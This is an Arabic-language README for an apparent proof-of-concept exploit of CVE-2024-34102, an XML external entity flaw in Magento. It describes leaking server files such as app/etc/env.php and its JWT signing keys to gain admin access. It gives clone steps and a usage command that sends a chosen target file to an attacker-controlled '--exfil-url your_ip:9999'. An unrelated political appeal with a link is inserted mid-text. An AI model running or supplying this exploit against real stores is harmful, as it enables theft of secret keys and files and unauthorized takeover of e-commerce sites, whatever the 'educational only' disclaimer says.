
إثبات مفهوم لاستغلال CVE-2024-34102، وهو حقن كيانات XML حرج في Magento، مما يتيح استخراج الملفات الحساسة والوصول غير المصرح به إلى لوحة الإدارة. للاستخدام التعليمي فقط.
نطالب بالإعادة الآمنة لجميع المواطنين الذين تم احتجازهم كرهائن من قبل الجماعة الإرهابية حماس. لن نرتاح حتى يتم إطلاق سراح كل رهينة ويعود إلى منزله بأمان. يمكنك المساعدة في إعادتهم إلى ديارهم. https://stories.bringthemhomenow.net/
يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال ثغرة حقن كيانات XML الحرجة (CVE-2024-34102) في Magento. تسمح هذه الثغرة بتسريب الملفات الحساسة، والتي يمكن بعد ذلك استغلالها للحصول على وصول غير مصرح به إلى وظائف الإدارة في Magento. تم تصميم هذا الاستغلال لأغراض تعليمية ويجب استخدامه بمسؤولية.
Magento هو أحد أكثر حلول التجارة الإلكترونية شيوعًا المستخدمة عالميًا. في يونيو 2024، تم اكتشاف ثغرة حرجة في حقن كيانات XML قبل المصادقة، تم تحديدها باسم CVE-2024-34102. يمكن أن تؤدي هذه الثغرة إلى عواقب وخيمة، بما في ذلك تسريب ملف app/etc/env.php من Magento، والذي يحتوي على مفاتيح التشفير المستخدمة لتوقيع JWTs.
requests (pip install requests)استنساخ المستودع:
git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
cd CVE-2024-34102-exploit
تنفيذ البرنامج النصي مع الوسائط اللازمة:
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
--target-url: عنوان URL لمثيل Magento المستهدف.--target-file: مسار الملف على الخادم المستهدف لتسريبه.--exfil-url: عنوان URL لاستقبال البيانات المسربة.python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999